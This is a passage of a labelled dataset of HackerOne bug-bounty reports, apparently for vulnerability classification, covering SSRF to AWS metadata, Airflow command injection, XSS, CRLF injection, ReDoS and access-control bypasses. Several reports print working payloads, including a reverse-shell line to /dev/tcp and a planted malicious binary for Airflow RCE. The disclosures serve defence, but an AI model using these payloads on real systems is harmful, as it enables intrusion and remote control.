empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n\n```\n.\n**Http Response**\n```http\nHTTP/1.1 200 OK\nServer: nginx/1.21.6\nDate: Mon, 04 Jul 2022 05:42:12 GMT\nContent-Type: text/plain\nConnection: close\nStrict-Transport-Security: max-age=31536000; includeSubdomains\nX-Frame-Options: DENY\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nX-Download-Options: noopen\nX-Permitted-Cross-Domain-Policies: none\nContent-Security-Policy: object-src 'none'; script-src 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https: http:;\nFront-End-Https: on\nContent-Length: 313\n\nami-id\nami-launch-index\nami-manifest-path\nblock-device-mapping/\nevents/\nhostname\nidentity-credentials/\ninstance-action\ninstance-id\ninstance-life-cycle\ninstance-type\nlocal-hostname\nlocal-ipv4\nmac\nmetrics/\nnetwork/\nplacement/\nprofile\npublic-hostname\npublic-ipv4\npublic-keys/\nreservation-id\nsecurity-groups\nservices/\n```\n.\n.\n**SCREEN SHOT**\n████\n.\n.\n\n## Impact\n\nSSRF Vulnerability \nRemote Access to AWS metadata\n\n## System Host(s)\n█████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1 - Visit https://██████████\n2 - Press 'Import from URL' Button & Enter SSRF Payload in the Dialog Box\n3 - Intercept the Request & observe the response\n\n## Suggested Mitigation/Remediation Actions\nSanitize user supplied input in paramter `?url=`\nBlock access to internal networks", "source": "hackerone", "timestamp": "2022-09-14", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "dbc5cbfc7b5caa51eec0", "text": "[Violation of Secure Design Principles] Ability to control the filename when uploading a logo or favicon on theming\n\n## Summary:\nHello,\n\nWhen uploading a logo or favicon the filename can be controlled by attacker since the ```key``` can be modified which serves as the filename.\n\n\n{F2044799}\n\n{F2044800}\n\n{F2044798}\n\nDue to an error the path is also disclosed\n\n{F2044802}\n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n1. go to ```http://localhost/settings/admin/theming```\n2. upload a logo or favicon\n3. intercept the request using burp\n4. modify the key\n\n## Impact\n\nThe attacker can upload any files directly in the webapp and path disclosure. Combining both information can be useful in later attacks.", "source": "hackerone", "timestamp": "2023-04-10", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "fe57ca9652be68339dd2", "text": "[Cleartext Transmission of Sensitive Information] CVE-2023-23915: HSTS amnesia with --parallel\n\n## Summary:\ncurl overwrites HSTS cache entries if requests are performed in parallel.\n\n## Steps To Reproduce:\n\n 1. `curl --parallel --hsts hsts.txt https://site1.tld https://site2.tld https://site3.tld`\n\nOnly one of the sites contacted will have entry in `hsts.txt` afterwards. Non-TLS connection to the other sites will not protected by TLS.\n\n## Impact\n\nRequest performed over insecure channels unexpectedly and loss of confidentiality and integrity.", "source": "hackerone", "timestamp": "2023-02-15", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "a50ca615ca8c022d230e", "text": "[Information Disclosure] Any organization's assets pending review can be downloaded\n\n# Steps to reproduce\n- sign in as any user\n- visit https://hackerone.com/organizations/:handle/assets/download_pending_reviews.csv, where `:handle` is the organization you want to download the assets for\n\n## Impact\n\nThis may leak sensitive data about an organization's attack surface.", "source": "hackerone", "timestamp": "2022-11-29", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "3e15454ad4bf07d76d7b", "text": "[Cleartext Storage in a File or on Disk] OAuth2 client_secret stored in plain text in the database\n\nIf an attacker would obtain a dumb of the database they could read out the OAuth2 client secret trivially.\nhttps://github.com/nextcloud/server/blob/master/apps/oauth2/lib/Controller/OauthApiController.php#L128\n\nWhile I realise this is a big if it is not that hard to make sure the client secret is stored properly hashed.\nOr at the very least make sure it is stored encrypted. (however non recoverable has the preference here I'd say)\n\n## Impact\n\nAn attacker obtaining the read access to a dump of the database can trivially impersonate any OAuth2 client.", "source": "hackerone", "timestamp": "2023-11-15", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "08fb5b8311444e3e0b0d", "text": "[Improper Access Control - Generic] Staff can create workflows in Shopify Admin without apps permission\n\n## Summary:\n[add summary of the vulnerability]\n\nAccording to publicly available docs, Flow can be accessed in two ways.\n1. through the Shopify organization admin (Shopify plus)\n2. by installing the Shopify Flow app.\nI stumbled on /admin/internal/web/graphql/flow endpoint which is accessible to a staff member with only `marketing` permission. The said endpoint makes it possible to create workflows and perform other flow related actions without using any of the two methods stated above. To substantiate my claim, I created a workflow that 'adds a tag whenever a customer registers an account' (created an account tag) see the image below for details.\n{F1667015} \n\nIt's worth mentioning that the workflows created this way don't show up in the app or any where else, information about them can only be gotten by hitting the same endpoint. There are couple of other mutations that are accessible but I used only `templateInstall` and `workflowActivate` for demonstration. What follows below are example GraphQL queries and steps to reproduce.\nFirst, we need to install a template to activate. \nSee the image below for details\n{F1667014}\n\n```\n{\"operationName\":\"templateInstall\",\"variables\":{\"templateId\":\"977bf9aa-ae6a-4a7c-b3f2-051c9e856c6f\",\"shopIds\":[]},\"query\":\"mutation templateInstall($templateId: ID!, $shopIds: [ID!]!) {\\n templateInstall(templateId: $templateId, shopIds: $shopIds) {\\n installed {\\n shopId\\n workflowId\\n workflowVersion\\n __typename\\n }\\n errors {\\n shopId\\n message\\n __typename\\n }\\n __typename\\n }\\n}\\n\"}\n\n```\nAfter installing a template of our choice, we then activate the workflow. \nSee the image below for details.\n{F1667018}\n\n```\n{\"operationName\":\"activateWorkflowMutation\",\"variables\":{\"workflowId\":\"240ed0ee-d099-4066-8eac-7ce777ef4fe4\",\"version\":\"acc5731a-7802-4622-857b-0191f8c0ee9d\",\"contextType\":\"shop\",\"contextId\":\"10979704928\"},\"query\":\"mutation activateWorkflowMutation($workflowId: ID!, $version: String, $contextType: String!, $contextId: ID!) {\\n workflowActivate(\\n workflowId: $workflowId\\n version: $version\\n contextType: $contextType\\n contextId: $contextId\\n ) {\\n workflow {\\n ...workflow\\n __typename\\n }\\n __typename\\n }\\n}\\n\\nfragment workflow on Workflow {\\n id\\n name\\n steps {\\n ...step\\n __typename\\n }\\n links {\\n ...link\\n __typename\\n }\\n activations {\\n ...activation\\n __typename\\n }\\n lastUpdated\\n activationState\\n versionState\\n version\\n parentVersion\\n shopifyDomain\\n shopifyName\\n owner {\\n contextId\\n contextType\\n __typename\\n }\\n ...validationErrors\\n tags\\n __typename\\n}\\n\\nfragment step on Step {\\n id\\n task {\\n ...task\\n __typename\\n }\\n position {\\n x\\n y\\n __typename\\n }\\n inputPort {\\n name\\n identifier\\n __typename\\n }\\n outputPorts {\\n name\\n identifier\\n __typename\\n }\\n ...stepConfig\\n note\\n description\\n __typename\\n}\\n\\nfragment task on Task {\\n id\\n label\\n description\\n dynamicDescriptionTemplate\\n taskType\\n path\\n inputPort {\\n id\\n name\\n __typename\\n }\\n outputPorts {\\n id\\n name\\n __typename\\n }\\n iconUrl\\n documentationUrl\\n __typename\\n}\\n\\nfragment stepConfig on Step {\\n id\\n taskType\\n task {\\n id\\n label\\n description\\n __typename\\n }\\n configFields {\\n __typename\\n ... on ArrayConfigField {\\n valuePlaceholder\\n stepConfigFieldIdentifier\\n supportsLiquid\\n description\\n label\\n value\\n validations {\\n id\\n options\\n errorMessage\\n __typename\\n }\\n __typename\\n }\\n ... on CollectionsConfigField {\\n valuePlaceholder\\n stepConfigFieldIdentifier\\n description\\n label\\n value\\n errors {\\n title\\n message\\n __typename\\n }\\n __typename\\n }\\n ... on BooleanConfigField {\\n valuePlaceholder\\n ", "source": "hackerone", "timestamp": "2022-10-13", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "d7edfd23f333d782dcb2", "text": "[Command Injection - Generic] CVE-2022-24288: Apache Airflow: TWO RCEs in example DAGs\n\nIn Apache Airflow, prior to version 2.2.4, In DAG script of airflow , there is two command injection vulnerability (RCE) in the some scripts, which an attacker can execute arbitrary commands on the system. The impact is even greater when airflow is configured for unauthenticated access. These two RCEs are assigned the same CVE number(CVE-2022-24288)\n\n## Impact\n\n#RCE one: example_passing_params_via_test_command.py command injection\n\n##Vulnerability summary:\nIn Apache Airflow, prior to version 2.2.4, there is a command injection vulnerability (RCE) in the script (example_passing_params_via_test_command.py), which can obtain the permission of the operating system. \n##Vulnerability principle:\n1. It can be seen from the source code of example_passing_params_via_test_command script that there is the function of executing bash command, The parameters Foo and MIFF in the template expressions {{params. Foo}} and {{params. Foo}} are externally controllable and rendered through the jiaja2 template: \n\n{F1634883}\n\n{F1634884}\n2. Further analysis “from airflow.operators.bash import BashOperator” code, we can see bash_command parameter value will be executed as a bash script;\n\n{F1634885}\n\n##Vulnerability exploitation :\n1. Enter the DAGs menu and start example_passing_params_via_test_command task, select “Trigger DAG w/ config”. \n\nhttp://192.168.3.17:8080/trigger?dag_id=example_passing_params_via_test_command\n\n{F1634887}\n2. To construct payload, we can know from the following code that we need to splice commands with semicolons after closing double quotation marks, so as to inject any operating system commands to be executed(RCE).\n\n{F1634888}\nPAYLOAD:`{\"foo\":\"\\\";touch /tmp/pwnedaaaaa;\\\"\"}`, Then click trigger to execute the task.\n\n{F1634889}\n\n{F1634890}\nThrough the log and background view, it can be seen that any command has been executed successfully.\n\n{F1634891}\n\n{F1634892}\n3. Further execute the reverse shell to obtain operating system permissions.\nPayload:` {\"foo\":\"\\\";bash -i >& /dev/tcp/192.168.3.7/6666 0>&1;\\\"\"}`\n\n{F1634893}\n\n{F1634894}\n\n#RCE two: tutorial.py DAG command injection\n\n##Vulnerability summary:\nIthere is a command injection vulnerability (RCE) in the script (tutorial.py), which an attacker can execute arbitrary commands on the system. \n##Vulnerability principle:\n1. It can be seen from the source code of tutorial script that there is the function of executing bash command, The parameters “my_param�� in the template expressions {{params.my_param}} is externally controllable and rendered through the jinja2 template: \n\n{F1634906}\n2. Further analysis “from airflow.operators.bash import BashOperator” code, we can see bash_command parameter value will be executed as a bash script;\n\n{F1634907}\n#Vulnerability exploitation:\n1. Enter the DAGs menu and start tutorial task, select “Trigger DAG w/ config”. \n\nhttp://192.168.3.17:8080/trigger?dag_id=tutorial\n\n{F1634908}\n2. To construct payload, we can know from the following code that we need to splice commands with semicolons after closing double quotation marks, so as to inject any operating system commands to be executed(RCE).\n\n{F1634913}\nPAYLOAD:`{\"my_param\":\"\\\";touch /tmp/pwnedddddd;\\\"\"}`, Then click trigger to execute the task.\n\n{F1634915}\n\n{F1634916}\nThrough the log and background view, it can be seen that arbitrary command has been executed successfully.\n\n{F1634917}", "source": "hackerone", "timestamp": "2022-04-01", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "2afb08fcd6ecab610be6", "text": "[Cross-Site Scripting (XSS)] HTML Injection at https://stage.firefoxmonitor.nonprod.cloudops.mozgcp.net/user/unsubscribe\n\nHello, \n\nThe \"Unsubscribe\" page seems to be affected by Cross-Site Scripting (XSS) .Unfortunately my IP was blocked and I couldn't go ahead with the test to find a real proof of concept. So I'll just stick to this\n\nPOC:\n\nhttps://stage.firefoxmonitor.nonprod.cloudops.mozgcp.net/user/unsubscribe?%27%22%3E%3C/title%3E%3Cscript%3Ealert(xss)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%3C/h1%3E%3C/marquee%3E \n\nCheers\n\n## Impact\n\nAn attacker could use this to inject malicious client side code, such as JavaScript, and execute it within the context of another user. This could possibly lead to user account compromises, user’s being socially engineered and many more attacks against the application’s users.", "source": "hackerone", "timestamp": "2023-10-20", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "520d5865d6f73937d469", "text": "[CRLF Injection] 'net/http': HTTP Header Injection in the set_content_type method\n\nThe set\\_content\\_type's parameter is not filtered to prevent the injection from altering the entire request.\n\nThe vulnerable code:\n```ruby\n def set_content_type(type, params = {})\n @header['content-type'] = [type + params.map{|k,v|\"; #{k}=#{v}\"}.join('')]\n end\n```\n\n# PoC\n\n1.\n```ruby\nrequire 'net/http'\n\nuri = URI('http://127.0.0.1:8080')\nreq = Net::HTTP::Post.new(uri)\nreq.set_content_type('text/html', \"charset\" => \"iso-8859-1\\nHeader:Inject\")\n\nresp = Net::HTTP.start(uri.hostname, uri.port) do |http|\n http.request(req)\nend\n```\n\n2.\n```\n$ nc -lvp 8080\nListening on 0.0.0.0 8080\nConnection received on localhost 57620\nPOST / HTTP/1.1\nAccept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3\nAccept: */*\nUser-Agent: Ruby\nHost: 127.0.0.1:8080\nContent-Type: text/html; charset=iso-8859-1\nHeader:Inject # <<<<<<<<\nContent-Length: 0\n```\n\nI set the same severity as [CVE-2020-26116](https://nvd.nist.gov/vuln/detail/CVE-2020-26116) has.\n\n## Impact\n\nIn web applications a CRLF injection can have severe impacts, depending on what the application does with single items. Impacts can range from information disclosure to code execution, a direct impact web application security vulnerability.", "source": "hackerone", "timestamp": "2022-02-04", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "8567102bd13ee3dcfd1c", "text": "[HTTP Request Smuggling] CVE-2022-32213 - HTTP Request Smuggling Due to Flawed Parsing of Transfer-Encoding\n\nOriginal Report: https://hackerone.com/reports/1524555\n\n## Impact\n\nDepending on the specific web application, HRS can lead to cache poisoning, bypassing of security layers, stealing of credentials and so on.", "source": "hackerone", "timestamp": "2022-07-22", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "cdcdd3a147f14d05d37a", "text": "[Insecure Storage of Sensitive Information] Splunk Sensitive Information Disclosure @████████\n\nHi Team,\n\nHope you are doing great.\nI got a domain that contains Splunk Sensitive Information Disclosure @██████████\nPoC:\nhttps://███████/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json\n█████████\n\nSplunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.\n\nReference:\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11409\n - https://github.com/kofa2002/splunk\n - https://www.exploit-db.com/exploits/44865/\n - http://web.archive.org/web/20211208114213/https://securitytracker.com/id/1041148\n\n## Impact\n\nSplunk Sensitive Information Disclosure\n\n## System Host(s)\n██████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nOpen this link:\nhttps://█████████/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2023-02-13", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "7b572a7ca3c7bb00673b", "text": "[Uncontrolled Resource Consumption] @nextcloud/logger NPM package brings vulnerable ansi-regex version\n\n## Summary:\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to the sub-patterns [[\\\\]()#;?]* and (?:;[-a-zA-Z\\\\d\\\\/#&.:=?%@~_]*)*.\n\n## Details: \nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\n## Steps To Reproduce:\n\n 1. First I download the code (https://github.com/nextcloud/password_policy) I usual cat files and See the technologies that the site use and its versions I Found that You use `ansi-regex`\n 2. then I cat every file and find in package-lock.json has the version I have the versions of the ansi-regex with a lot of versions there some of some vulnerable and other update to the latest version and the vulnerable paths is \n```json\n},\n\t\t\t\t\"strip-ansi\": {\n\t\t\t\t\t\"version\": \"3.0.1\",\n\t\t\t\t\t\"resolved\": \"https://registry.npmjs.org/strip-ansi/-/strip-ansi-3.0.1.tgz\",\n\t\t\t\t\t\"integrity\": \"sha1-ajhfuIU9lS1f8F0Oiq+UJ43GPc8=\",\n\t\t\t\t\t\"requires\": {\n\t\t\t\t\t\t\"ansi-regex\": \"^2.0.0\"\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\t\t\"has-ansi\": {\n\t\t\t\"version\": \"2.0.0\",\n\t\t\t\"resolved\": \"https://registry.npmjs.org/has-ansi/-/has-ansi-2.0.0.tgz\",\n\t\t\t\"integrity\": \"sha1-NPUEnOHs3ysGSa8+8k5F7TVBbZE=\",\n\t\t\t\"requires\": {\n\t\t\t\t\"ansi-regex\": \"^2.0.0\"\n\t\t\t},\n\n\t\t\t\"dependencies\": {\n\t\t\t\t\"ansi-regex\": {\n\t\t\t\t\t\"version\": \"2.1.1\",\n\t\t\t\t\t\"resolved\": \"https://registry.npmjs.org/ansi-regex/-/ansi-regex-2.1.1.tgz\",\n\t\t\t\t\t\"integrity\": \"sha1-w7M6te42DYbg5ijwRorn7yfWVN8=\"\n\t\t\t\t}\n\n\t\t\t\t\"node_modules/babel-code-frame/node_modules/ansi-regex\": {\n\t\t\t\"version\": \"2.1.1\",\n\t\t\t\"resolved\": \"https://registry.npmjs.org/ansi-regex/-/ansi-regex-2.1.1.tgz\",\n\t\t\t\"integrity\": \"sha1-w7M6te42DYbg5ijwRorn7yfWVN8=\",\n\t\t\t\"engines\": {\n\t\t\t\t\"node\": \">=0.10.0\"\n\t\t\t}\n\t\t},\n\t\t\"node_modules/babel-code-frame/node_modules/strip-ansi\": {\n\t\t\t\"version\": \"3.0.1\",\n\t\t\t\"resolved\": \"https://registry.npmjs.org/strip-ansi/-/strip-ansi-3.0.1.tgz\",\n\t\t\t\"integrity\": \"sha1-ajhfuIU9lS1f8F0Oiq+UJ43GPc8=\",\n\t\t\t\"dependencies\": {\n\t\t\t\t\"ansi-regex\": \"^2.0.0\"\n\t\t\t}\n\t\t\t\"node_modules/has-ansi/node_modules/ansi-regex\": {\n\t\t\t\"version\": \"2.1.1\",\n\t\t\t\"resolved\": \"https://registry.npmjs.org/ansi-regex/-/ansi-regex-2.1.1.tgz\",\n\t\t\t\"integrity\": \"sha1-w7M6te42DYbg5ijwRorn7yfWVN8=\",\n\t\t\t\"engines\": {\n\t\t\t\t\"node\": \">=0.10.0\"\n\t\t\t}\n\t\t},\n```\n3. then I found that every version of ansi-regex before 4.1.1 as you see in the code you use 2.11,2.0.0,3.0.1 and these versions are vulnerable to Regular Expression Denial of Service (ReDoS) as every policy that Denial of service attack is out of scope so I didn't try anything to not make any damage to your work but I want to report it to you to investigate on that and update to the fixed version to denied this attack from happening. \n4. this is a poc that attacker can use to \n\n#POC\n```\nimport ansiRegex from 'ansi-regex';\n\nfor(var i = 1; i <= 50000; i++) { var time = Date.now(); var attack_str = \"\\u001B[\"+\";\".repeat(i*10000); ansiRegex().test(attack_str) var time_cost = Date.now() - time; console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost+\" ms\") \n```\n# Fix: \nupdate to these (4.1.1, 5.0.1, and 6.0.1) like you do in most of your code. \n\n## Supporting Materials:\n\nthis useful links that can you check on this vuln\n1. https://www.cve.org/CVERecord?id=CVE-2021-3807\n2. https://cwe.mitre.org/data/definitions/400.html\n3. https://security.snyk.io/vuln/SNYK-JS-ANSIREGEX-1583908\n\n## Impact\n\nthe attacker aimed at making a system inaccessible t", "source": "hackerone", "timestamp": "2022-07-29", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "82454db3b2a0cda1cb3f", "text": "[Improper Input Validation] Apache Airflow Google Cloud Sql Provider Remote Command Execution\n\n## 0x01 Test environment\nairflow 2.5.1\n[apache-airflow-providers-google](https://airflow.apache.org/docs/apache-airflow-providers-google/8.8.0/) 8.8.0\nBuild with docker compose\n## 0x02 Reproduction steps\n### 2.1 Prepare the malicious executable\nWrite the following `exec.cpp` file.\n```\n#include\nusing namespace std;\nint main(){\n system(\"mkdir /tmp/hello\");\n return 0;\n}\n```\nIn a linux environment, use g++ to compile and rename it to system\n```python\ng++ exec.cpp -o system\n```\n{F2213397}\nPut the compiled system malicious executable file into Google Cloud Storage, and set the permission to public. My address for this exploit is [https://storage.googleapis.com/swordlight/system](https://storage.googleapis.com/swordlight/system)\n\n### 2.2 Creating a Malicious Google Cloud SQL Database Connection\nCreate the following Google Cloud SQL Database connection named aaa under Admin->Connections Among them.\nHost, Schema, Login, and Port filed are required, just fill in the content that conforms to the format.\n{F2213400}\nAmong them, Extra filed fills in the actual content as follows, and note that sql_proxy_version is set to `../swordlight/system?a=`\n```python\n{\n \"project_id\":\"pivotal-gearing-375804\",\n \"instance\":\"hellopg\",\n \"location\":\"us-central1-b\",\n \"database_type\":\"postgres\",\n \"use_proxy\":\"True\",\n \"use_ssl\":\"False\",\n \"sql_proxy_use_tcp\":\"True\",\n \"sql_proxy_version\":\"../swordlight/system?a=\",\n \"sslcert\":\"\",\n \"sslkey\":\"\",\n \"sslrootcert\":\"\"\n}\n```\n### 2.3 Use the CloudSQLExecuteQueryOperator operator in Dag for verification\nCreate a google_test.py script that uses the CloudSQLExecuteQueryOperator operator. \nPut it in the `/opt/airflow/dags` directory so that it can be automatically loaded by airflow.The content is as follows, where gcp_cloudsql_conn_id is set to the connection name aaa we established above.\n```python\nfrom __future__ import annotations\n\nimport os\nimport subprocess\nfrom datetime import datetime\nfrom os.path import expanduser\nfrom urllib.parse import quote_plus\n\nfrom airflow import models\nfrom airflow.providers.google.cloud.operators.cloud_sql import CloudSQLExecuteQueryOperator\n\n\nSQL = [\n \"CREATE TABLE IF NOT EXISTS TABLE_TEST (I INTEGER)\",\n \"CREATE TABLE IF NOT EXISTS TABLE_TEST (I INTEGER)\", # shows warnings logged\n \"INSERT INTO TABLE_TEST VALUES (0)\",\n \"CREATE TABLE IF NOT EXISTS TABLE_TEST2 (I INTEGER)\",\n \"DROP TABLE TABLE_TEST\",\n \"DROP TABLE TABLE_TEST2\",\n]\n\n\npostgres_kwargs = dict(\n user=\"postgres\",\n password=r\"ktd2(%EzQ5\",\n public_port=\"5432\",\n public_ip=\"34.122.52.6\",\n project_id=\"pivotal-gearing-375804\",\n location=\"us-central1-b\",\n instance=\"hellopg\",\n database=\"postgres\",\n client_cert_file=\"key/postgres-client-cert.pem\",\n client_key_file=\".key/postgres-client-key.pem\",\n server_ca_file=\".key/postgres-server-ca.pem\",\n)\n\n\n# Postgres: connect via proxy over TCP\nos.environ[\"AIRFLOW_CONN_PROXY_POSTGRES_TCP\"] = (\n \"gcpcloudsql://{user}:{password}@{public_ip}:{public_port}/{database}?\"\n \"database_type=postgres&\"\n \"project_id={project_id}&\"\n \"location={location}&\"\n \"instance={instance}&\"\n \"use_proxy=True&\"\n \"sql_proxy_use_tcp=True\".format(**postgres_kwargs)\n)\n\nconnection_names = [\n \"proxy_postgres_tcp\",\n]\n\nwith models.DAG(\n dag_id=\"example_gcp_sql_query\",\n start_date=datetime(2021, 1, 1),\n catchup=False,\n tags=[\"example\"],\n) as dag:\n prev_task = None\n\n\n task = CloudSQLExecuteQueryOperator(\n gcp_cloudsql_conn_id=\"aaa\",gcp_conn_id=\"proxy_postgres_tcp\",task_id=\"example_gcp_sql_task_proxy_postgres_tcp\" , sql=SQL\n )\n tasks.append(task)\n if prev_task:\n prev_task >> task\n prev_task = task\n\n# [END howto_operator_cloudsql_query_operators]\n```\n{F2213402}\nOpen the example_gcp_sql_query dag corresponding to our google_test.py script in the UI management interface, and run.\n{F2213403}\nClick to view the running graph and logs through the Graph menu.\n{F2213404}\n{F2213405}\nIt can be seen fr", "source": "hackerone", "timestamp": "2023-04-16", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "44a77ce8e0cfb4e26c0f", "text": "[Information Exposure Through an Error Message] Tor Project - Full Path Disclosure\n\nHi there,\n\nWhile you are primarily interested in the network/browser issues, I would like to report a web bug I discovered and thought the best place to do that would be here.\n\n# Vulnerability\n\nType: Full Path Disclosure [CWE-209]\nAffected endpoint: https://explorer.ooni.torproject.org\nExample: https://explorer.ooni.torproject.org//x\n\n# Details\nVulnerability details as follows.\n\n## Impact\nThis security vulnerability could potentially allow a malicious hacker to map an attack against internal systems. For example, if this were to be chained with another vulnerability such as path traversal; it may lead to compromise of internal systems.\n\n## Mitigation\nTypically these sort of errors occur from incorrect data types, in this case it seems like it is just a simple 404 page which is however leaking too much information to the user. \n\nA best practice method is to log these type of errors to a local text file, while showing the user a friendly 404 message. This is often achieved by disabling error reporting on the application side.", "source": "hackerone", "timestamp": "2023-11-28", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "2feed3dce9b5eaeaa11c", "text": "[Misconfiguration] Subdomain Takeover on proxies.sifchain.finance pointing to vercel\n\nHello Team,\n\nSubdomain takeover vulnerabilities occur when a subdomain (subdomain.example.com) is pointing to a service (e.g. GitHub pages, Heroku, etc.) that has been removed or deleted. This allows an attacker to set up a page on the service that was being used and point their page to that subdomain. For example, if subdomain.example.com was pointing to a GitHub page and the user decided to delete their GitHub page, an attacker can now create a GitHub page, add a CNAME file containing subdomain.example.com, and claim subdomain.example.com.\nHere there is a Sifchain domain (proxies.sifchain.finance) which is pointing towards vercel pages so this domain can be taken over can can be used to do any type of attacks mostly i can make a fake login page on your behalf and spoof your users, this is a critical vulnerability and needs to be fixed .\n\n{F1627827}\n\nVulnerable url : https://proxies.sifchain.finance/\n\n{F1627821}\n\nCname: cname.vercel-dns.com\nName: proxies.sifchain.finance\nType: CNAME\nClass: IN\n\n## Steps To Reproduce/Concept:\n\n1. Visit https://vercel.com/login and login with dev sifchain account\n\n2. Check the availability of the proxies.sifchain.finance sub domain at https://vercel.com/[YourUsername]/sveltekit/settings/domains\n\n3. The proxies.sifchain.finance sub domain does not exist. Potential to be claimed by others\n\n## Remediation:\nRemove the cname entry or claim the subdomain proxies.sifchain.finance on vercel.com\n\n## References:\nhttps://github.com/EdOverflow/can-i-take-over-xyz/issues/183\n\n{F1627822}\n{F1627826}\n\nhttps://github.com/EdOverflow/can-i-take-over-xyz\nhttps://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/\nhttps://0xpatrik.com/subdomain-takeover/\nhttp://yassineaboukir.com/blog/neglected-dns-records-exploited-to-takeover-subdomains/\n\nBest Regards,\n@hrdfrdh\n\n## Impact\n\nFake website\nMalicious code injection\nUsers tricking\nCompany impersonation\nThis issue can have really huge impact on the companies reputation someone could post malicious content on the compromised site and then your users will think it's official but it's not", "source": "hackerone", "timestamp": "2022-04-01", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "e66ff53a2f5a72664259", "text": "[Code Injection] CVE-2023-5528: Insufficient input sanitization in in-tree storage plugin leads to privilege escalation on Windows nodes\n\nThis is an imported report from the email i have sent a month ago about a code injection vulnerability\nThe vulnerability was assigned as CVE-2023-5528\nAs a reference i have talked with Balaji from the k8 team.\nExcerpts from the email chain that might be relevant:\n\n\"Just a quick update to let you know that we were able to reproduce the issue and are working on a fix. CVE-2023-5528 has been reserved for this issue. We'll keep you updated on the next steps as we review the proposed fix.\"\n\n\"Hi Tomer,\nThis is being rated as a Tier 1 High severity ($5,000) bounty.\"\n\nThe vulnerability was verified and assigned a CVE by the k8 team\n\n## Impact\n\nCode execution from kubelet context(SYSYTEM privileges) on all windows nodes on a cluster.", "source": "hackerone", "timestamp": "2023-12-21", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "0c4656265c993c32f3cd", "text": "[Improper Access Control - Generic] Adobe ColdFusion - Access Control Bypass [CVE-2023-38205] at ██████\n\nHello Gents, I would like to report an issue where attackers are able to bypass the product feature that restricts external access to the ColdFusion Administrator. [CVE-2023-38205] at `██████`\n\n\n\n## Steps to reproduce\n+ Please open the following link:\n\n> https://█████████/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx\n\n## Proof of concept\n\n+ ████\n\n## Impact\n\nAccess Control Bypass.\n\nThanks and have a nice day!\n\n## System Host(s)\n██████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n+ Please open the following link:\n\n> https://████████/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2023-09-08", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "85091e5911faad44b210", "text": "[Improper Access Control - Generic] Renderers can obtain access to random bluetooth device without permission\n\nWith the default configuration in Electron, renderer processes (which should not have access to system resources by default) can gain read/write access to a nearby bluetooth device. To reproduce:\n\n* Run the electron-quick-start app with a vulnerable version of Electron: https://github.com/electron/electron-quick-start\n* Using the developer tools, run `await navigator.bluetooth.requestDevice({acceptAllDevices: true})`\n* You should get a permission error, but in vulnerable versions you will get a bluetooth device object instead.\n\n## Impact\n\nIf an Electron app loads remote or untrusted content in a renderer process (which is normally fine, as the process should not have any privileges), the remote content would have read/write access to nearby bluetooth devices. The impact would then depend on what devices the user has nearby.", "source": "hackerone", "timestamp": "2022-04-23", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "7f0c9ce109e6d17a56c8", "text": "[Uncontrolled Resource Consumption] [CVE-2023-22799] Possible ReDoS based DoS vulnerability in GlobalID\n\nI made a report and patch at https://hackerone.com/reports/1696752.\n\nhttps://discuss.rubyonrails.org/t/cve-2023-22799-possible-redos-based-dos-vulnerability-in-globalid/82127\n> There is a possible DoS vulnerability in the model name parsing section of the GlobalID gem. Carefully crafted input can cause the regular expression engine to take an unexpected amount of time. All users running an affected release should either upgrade or use one of the workarounds immediately.\n\n## Impact\n\nReDoS occurs in Global ID uri parsing.\nGlobal ID is supposed to be used in ActiveJob, but it is also used in libraries such as GraphQL Ruby and uses user input.", "source": "hackerone", "timestamp": "2023-07-27", "split": "val", 